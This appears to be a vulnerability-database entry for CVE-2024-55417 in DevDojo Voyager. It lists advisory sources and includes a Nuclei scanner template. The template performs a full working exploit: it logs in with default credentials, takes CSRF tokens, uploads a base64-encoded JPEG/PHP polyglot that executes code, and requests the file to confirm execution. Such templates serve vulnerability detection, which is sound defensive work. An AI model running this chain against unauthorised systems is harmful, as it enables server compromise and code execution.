| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2024-55417 | 30 Jan 2025 15:15 | – | attackerkb |
| The vulnerability of the getMimeType function in the Voyager PHP framework Laravel allows a hacker to execute arbitrary code. | 31 Jan 2025 00:00 | – | bdu_fstec |
| CVE-2024-55417 | 30 Jan 2025 15:16 | – | circl |
| Voyager Security Vulnerability | 30 Jan 2025 00:00 | – | cnnvd |
| CVE-2024-55417 | 30 Jan 2025 00:00 | – | cve |
| CVE-2024-55417 | 30 Jan 2025 00:00 | – | cvelist |
| EUVD-2024-52770 | 3 Oct 2025 20:07 | – | euvd |
| DevDojo Voyager Arbitrary File Write | 30 Jan 2025 15:31 | – | github |
| CVE-2024-55417 | 30 Jan 2025 15:15 | – | nvd |
| GHSA-35P2-5VRH-M3P6 DevDojo Voyager Arbitrary File Write | 30 Jan 2025 15:31 | – | osv |

```yaml
id: CVE-2024-55417

info:
  name: DevDojo Voyager <= 1.8.0 - Arbitrary File Write vulnerability
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    DevDojo Voyager through version 1.8.0 is vulnerable to bypassing the file type verification when an authenticated user uploads a file via /admin/media/upload. An authenticated user can upload a web shell causing arbitrary code execution on the server.
  impact: |
    Authenticated attackers can bypass file type restrictions to upload PHP web shells, allowing arbitrary code execution on the server with web server privileges.
  remediation: |
    Update DevDojo Voyager to version 1.8.1 or later to address the file upload validation bypass vulnerability.
  reference:
    - https://www.sonarsource.com/blog/the-tainted-voyage-uncovering-voyagers-vulnerabilities/
    - https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerMediaController.php#L238
  classification:
    cve-id: CVE-2024-55417
    epss-score: 0.12298
    epss-percentile: 0.95695
  metadata:
    verified: true
    max-request: 5
    shodan-query: title:"Voyager"
  tags: cve,cve2024,intrusive,devdojo,voyager,file-upload,authenticated,vuln

flow: http(1) && http(2) && http(3) && http(4) && http(5)

variables:
  username: "[email protected]"
  password: "password"

http:
  - raw:
      - |
        GET /admin/login HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        internal: true
        name: csrf
        group: 1
        regex:
          - 'name="_token" value="([a-zA-Z0-9]+)"'

  - raw:
      - |
        POST /admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _token={{csrf}}&email={{username}}&password={{password}}&

    matchers:
      - type: dsl
        dsl:
          - "contains(body,'/admin</title>')"
          - "status_code == 302"
        condition: and
        internal: true

  - raw:
      - |
        GET /admin/media HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        internal: true
        name: csrf2
        group: 1
        regex:
          - '"csrf-token" content="([a-zA-Z0-9]+)"'

  - raw:
      - |
        POST /admin/media/upload HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqv6qtCsokj1vi0NA

        ------WebKitFormBoundaryqv6qtCsokj1vi0NA
        Content-Disposition: form-data; name="_token"

        {{csrf2}}
        ------WebKitFormBoundaryqv6qtCsokj1vi0NA
        Content-Disposition: form-data; name="upload_path"

        /
        ------WebKitFormBoundaryqv6qtCsokj1vi0NA
        Content-Disposition: form-data; name="filename"

        null
        ------WebKitFormBoundaryqv6qtCsokj1vi0NA
        Content-Disposition: form-data; name="details"

        {"thumbnails":[],"watermark":{}}
        ------WebKitFormBoundaryqv6qtCsokj1vi0NA
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: text/php

        {{base64_decode('/9j//gApPD9waHAgZWNobyBiYXNlNjRfZGVjb2RlKCRfR0VUWyJxIl0pOz8+/9sAQwADAgICAgIDAgICAwMDAwQGBAQEBAQIBgYFBgkICgoJCAkJCgwPDAoLDgsJCQ0RDQ4PEBAREAoMEhMSEBMPEBAQ/8kACwgAAQABAQERAP/MAAYAEBAF/9oACAEBAAA/ANLPIP/Z')}}
        ------WebKitFormBoundaryqv6qtCsokj1vi0NA--

    matchers:
      - type: word
        part: body
        words:
          - 'Encoding format (php) is not supported.'
        internal: true

  - raw:
      - |
        GET /storage/{{randstr}}.php?q={{base64('{{randstr}}')}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"
# digest: 4a0a0047304502206a26ac9e217e3d3e4bce2e08c985b8e5de34cb95ca6b026318e2509687a402d4022100d5a31b9e6312816001801b035a5704a7e174fcd6e3e08c15e67c0e6c063d3ba0:922c64590222798bb761d5b6d8e72950
```